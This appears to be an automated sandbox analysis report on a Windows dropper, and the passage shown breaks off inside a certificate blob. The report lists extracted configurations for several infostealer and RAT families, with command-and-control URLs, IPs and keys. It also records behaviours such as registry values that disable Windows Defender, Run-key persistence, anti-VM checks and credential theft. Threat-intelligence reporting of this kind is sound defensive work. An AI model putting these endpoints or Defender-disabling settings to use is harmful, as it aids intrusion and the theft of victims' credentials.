Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 23:34
Static task
static1
Behavioral task
behavioral1
Sample
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
Resource
win10v2004-20250217-en
General
-
Target
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
-
Size
938KB
-
MD5
5a97dfa3080fd5ff60f22c76d10151aa
-
SHA1
ae3c5b370fdc8e87ecf3f7ce53c9de85033a8904
-
SHA256
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
-
SHA512
a9a7552369cc727a67b21e521db17c6d7f58d46abf3151ef2fe7ff4d796a5980a3e7c83ba4344481dcdc61da6fb04a095f43456827832661e9bdf4763b2a7fed
-
SSDEEP
24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a07u:TTvC/MTQYxsWR7a07
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
xworm
5.0
45.154.98.175:6969
uGmGtmYAbzOi1F41
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral1/memory/3548-856-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3548-852-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3548-850-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3548-848-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3548-846-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000500000001a4f0-465.dat family_xworm behavioral1/memory/3160-473-0x0000000000390000-0x00000000003A0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2972-453-0x00000000002E0000-0x0000000000738000-memory.dmp healer behavioral1/memory/2972-454-0x00000000002E0000-0x0000000000738000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e16f9098dd.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e16f9098dd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e16f9098dd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e16f9098dd.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" e16f9098dd.exe -
Stealc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a56a18c370.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2a1bc9d8d6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a2a6d35a13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a3f26c3fce.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e16f9098dd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4665ecc86d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2084 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2084 powershell.exe -
Downloads MZ/PE file 19 IoCs
flow pid Process 11 1412 BitLockerToGo.exe 26 1828 BitLockerToGo.exe 4 2084 powershell.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe 7 2352 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000700000001c852-828.dat net_reactor behavioral1/memory/3448-836-0x0000000001100000-0x0000000001160000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a56a18c370.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2a1bc9d8d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a3f26c3fce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e16f9098dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4665ecc86d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a3f26c3fce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e16f9098dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a56a18c370.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4665ecc86d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2a1bc9d8d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a2a6d35a13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a2a6d35a13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe -
Executes dropped EXE 24 IoCs
pid Process 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 2352 rapes.exe 3044 4665ecc86d.exe 984 76e0807425.exe 1548 76e0807425.exe 2552 a56a18c370.exe 2384 2a1bc9d8d6.exe 2648 a2a6d35a13.exe 1676 a3f26c3fce.exe 1612 b668242231.exe 2972 e16f9098dd.exe 3160 cnntXtU.exe 3384 nhDLtPT.exe 3464 Gxtuum.exe 3808 Ps7WqSx.exe 2460 FvbuInU.exe 3644 SvhQA35.exe 4044 chromium.exe 3448 mAtJWNv.exe 3548 mAtJWNv.exe 3864 ce4pMzk.exe 3672 MCxU5Fj.exe 3728 MCxU5Fj.exe 3696 MCxU5Fj.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 4665ecc86d.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 2a1bc9d8d6.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine e16f9098dd.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine a56a18c370.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine a2a6d35a13.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine a3f26c3fce.exe -
Loads dropped DLL 64 IoCs
pid Process 2084 powershell.exe 2084 powershell.exe 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 984 76e0807425.exe 1740 WerFault.exe 1740 WerFault.exe 1740 WerFault.exe 1740 WerFault.exe 1740 WerFault.exe 2100 WerFault.exe 2100 WerFault.exe 2100 WerFault.exe 2100 WerFault.exe 2100 WerFault.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe 2352 rapes.exe 2352 rapes.exe 1412 BitLockerToGo.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 1828 BitLockerToGo.exe 2352 rapes.exe 3384 nhDLtPT.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 2352 rapes.exe 3644 SvhQA35.exe 4044 chromium.exe 2352 rapes.exe 2352 rapes.exe 3448 mAtJWNv.exe 1364 WerFault.exe 1364 WerFault.exe 1364 WerFault.exe 2352 rapes.exe 2352 rapes.exe 3672 MCxU5Fj.exe 3672 MCxU5Fj.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3920 WerFault.exe 3920 WerFault.exe 3920 WerFault.exe 3920 WerFault.exe 3920 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features e16f9098dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e16f9098dd.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" cnntXtU.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\jLEaFdlg\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2a6d35a13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\a2a6d35a13.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3f26c3fce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\a3f26c3fce.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b668242231.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\b668242231.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\e16f9098dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107940101\\e16f9098dd.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000019632-289.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 2352 rapes.exe 3044 4665ecc86d.exe 2552 a56a18c370.exe 2384 2a1bc9d8d6.exe 2648 a2a6d35a13.exe 1676 a3f26c3fce.exe 2972 e16f9098dd.exe 2460 FvbuInU.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 984 set thread context of 1548 984 76e0807425.exe 42 PID 3044 set thread context of 1412 3044 4665ecc86d.exe 46 PID 2552 set thread context of 1828 2552 a56a18c370.exe 50 PID 3448 set thread context of 3548 3448 mAtJWNv.exe 87 PID 3672 set thread context of 3728 3672 MCxU5Fj.exe 93 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 1740 984 WerFault.exe 41 2100 1548 WerFault.exe 42 1888 2648 WerFault.exe 52 1364 3448 WerFault.exe 86 3788 3672 WerFault.exe 91 3920 3728 WerFault.exe 93 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4665ecc86d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a3f26c3fce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b668242231.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e16f9098dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76e0807425.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a56a18c370.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76e0807425.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2a1bc9d8d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a2a6d35a13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b668242231.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b668242231.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3024 taskkill.exe 2892 taskkill.exe 316 taskkill.exe 892 taskkill.exe 2000 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 2a1bc9d8d6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2a1bc9d8d6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2a1bc9d8d6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9